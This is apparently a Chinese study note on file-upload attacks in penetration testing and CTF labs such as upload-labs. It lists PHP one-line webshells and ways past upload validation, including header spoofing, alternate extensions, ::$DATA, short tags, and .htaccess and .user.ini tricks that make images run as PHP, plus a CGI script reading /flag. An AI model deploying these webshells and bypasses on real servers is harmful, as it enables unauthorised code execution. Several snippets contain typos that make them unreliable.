title: 文件上传学习笔记
date: 2021-5-22
tags: 渗透测试,文件上传,基础
categories:
渗透测试
文件上传
基础
文件上传学习笔记
2021/3/6 笔记
什么是一句话木马
一句话木马“服务端”(本地存储的脚本木马文件)
就是我们要用来将恶意代码上传到服务器的网站中执行权限
该语句触发后,接收入侵者通过客户端上传的数据,并完成相应的操作
好处:短小精悍、且功能强大
eval 意思是执行任意命令,将其当成php语言执行
<?php @eval($_GET[a]); ?> 加@是为了不在页面回显
<?php eval($_GET[a]); ?>
<?php eval($_POST[a]); ?>
<?php eval($_REQUEST[a]); ?>
<?php eval($_COOKIE[a]); ?>
一句话木马的变形
<?php assert($_POST[a]); ?>
连接工具
文件检测手法
-
客户端javascript校验(一般只校验后缀名)
-
服务端校验
- 文件头content-type字段校验(image/gif)(MIME类型)
- 文件内容头校验(GIF89a)
- 后缀名黑名单校验
- 后缀名白名单校验
- 自定义正侧校验
-
WAF设备校验(根据不同的WAF产品而定)
绕过
抓包,修改Content-Type:image/jpeg
文件头:伪造图片文件头(GIF89a)
客户端JavaScript校验
前端JS校验,可以直接绕过
文件头content-type校验
文件内容头校验
黑名单
<?php
//实际情况中黑名单内数据会更多更全
$blacklist = array('php','asp','aspx','jsp');
$path = "./uploads";
$type = array_pop(explode('.',$_FILED['myfile']['name']));
if (in_array(strtolower($type),$blacklist)){
die("File type errer!<br>");
}else{
$file = $path.'/'.$_FILES['myfile']['name'];
if(nove_uploaded_file($FILES['myfile']['tmp_name'],$file)){
echo 'Success!<br>';
}else{
echo 'Error!<br>';
}
}
?>
黑名单,尝试各种特殊文件名(php、Php、PHP、pht、php5、phtnl、shtml),或者在扩展名后添加空格、:: D A T A 、 . , DATA、., DATA、.,,/…,等字符,子啊或者尝试上传‘.htaccess’
防御手段
随机文件名+白名单后缀
PHP:
php2 php3 PHP5 phtml pht(是否解析需要根据配置文件中的设置类型来决定)
ASP:
asa cer cdx
ASPX:
ascx ashx asac
JSP:
jsp jspx jspf
绕过方法
php3 php4 php5
分别是php3版本 php4版本 php5版本的PHP文件,且向下兼容
upload-labs Pass-03
phtmlphtml是PHP2程序的标准文件扩展名upload-labs Pass-03
::$DATA(windows)上传文件为xxx.php::$DATA类型的文件。可以看到上传的文件为xxx.php::$data 。
大小写绕过.Php .PHtmlupload-labs Pass-05
https://www.freebuf.com/column/143101.html
内容检测
-
几种标签语法
<??><?php<?=?><%<script lanague='php'>
短标签
两种短语标签必须在php5.4.0之后
其中短语标签<? ?>需要在php.ini中开启配置short_open_tag才能使用
<?= 等价于 <? echo 不用开启短标签
<?= 'whoami'?><?= 'ls'?>
7.0.0 The ASP tags <%, %>, <%=, and the script tag <script language="php"> are ermoved from php5.4.0 The tag <?= is always available regardless of the short_open_tag ini setting.
其中ASP标签<% %>需要将asp_tags设成On
通过php小于7.0的可以通过绕过
<srcipt language='php'>phpinfo();</srcipt>
当<? 被绕过时,可以尝试用<srcipt lanague='php'>绕过条件:PHP版本小于7.0BUU[极客大挑战2019]upload
当PHP被过滤时,尝试用短标签<? ?>绕过条件:PHP版本>5.4且php.ini中开启配置short_open_tag=1交出你的猫猫图
过滤GET POST,尝试用eval($_REQUEST[a]);绕过
过滤eval,尝试用assert($_GET[a]);绕过
.htaccess
//.htaccessaddtype application/x-httpd-php .jpg
上传.htaccess把.jpg当作PHP解析,只需要上传带shell的.jpg文件即可
//shell.jpg<script language='php'></script>
过滤文件内容
/.htaccessaddtype application/x-httpd-php .wuwuphp_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"
base64.b64encode(b"<?php eval($_GET['c']);?>")
php_value auto_append_file 会给PHP文件附加后面的内容将shell的内容上传至shell.wuwuhtaccess上传至.htaccess然后访问shell.wuwu即可/只能执行命令 不能连接shell
-
上传cgi脚本
-
Options +ExecCGIAddHandler cgi-script .xx
-
cgi脚本最好在Linux下编写,保存为3.xx
-
#!/bin/bashecho "Content_type:text/plain"echo ""cat /flagexit 0
cig参考文档: https://www.freebuf.com/vuls218495.html
没有过滤.htaccess的黑名单时,考虑上传.htaccess文件使得jpg文件解析为PHPupload-labs Pass-04
当webshell中的字符全部被过滤的时候,考虑用.htaccess文件进行base64编码后上传
如果可以上传.cgi文件和.htaccess文件,可以考虑上传cgi脚本https://unctf.hackingfor.fun/#/train easy_upload
.user.ini
.user.ini用于nginx/apache/IIS中
#利用条件服务器脚本语言为PHP服务器使用CGI/Fast CGI模式上传目录下要有可以执行的PHP文件
.user.ini实际上就是一个可以由用户“自定义”的PHP.ini
*PHP_INI_模式的定义 | |
---|---|
模式 | 含义 |
PHP_INI_USER | 可以在用户脚本(例如ini_set())或Windows注册表(自PHP5.3起)以及.user.ini中设定 |
PHP_INI_PERDIR | 可在php.ini、.htaccess或httpd.conf中设定 |
PHP_INI_SYSTEM | 可在php.ini或http.conf中设定 |
PHP_INI_ALL | 可在任何地方设定 |
auto_append_file | NULL | PHP_INI_PERDIR | 在PHP <= 4.2.3时是PHP_INI_ALL |
---|---|---|---|
auto_detect_line_endings | "0" | PHP_INI_ALL | 从PHP4.3.0起可用 |
auto_globals_jit | "1" | PHP_INI_PERDIR | 从PHP5.0.0起可用 |
auto_prepend_file | NULL | PHP_INI_PERDIR | 在PHP <= 4.2.3时是PHP_INI_ALL |
auto_prepend_file string
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。使用方法很简单,直接写在user.ini中:
\x00\x00\x8a\x39\x8a\x39auto_perpend_file = cc.jpg
当不允许上传.htaccess服务器为nginx时,且为黑名单校验。请考虑上传.user.ini条件:服务器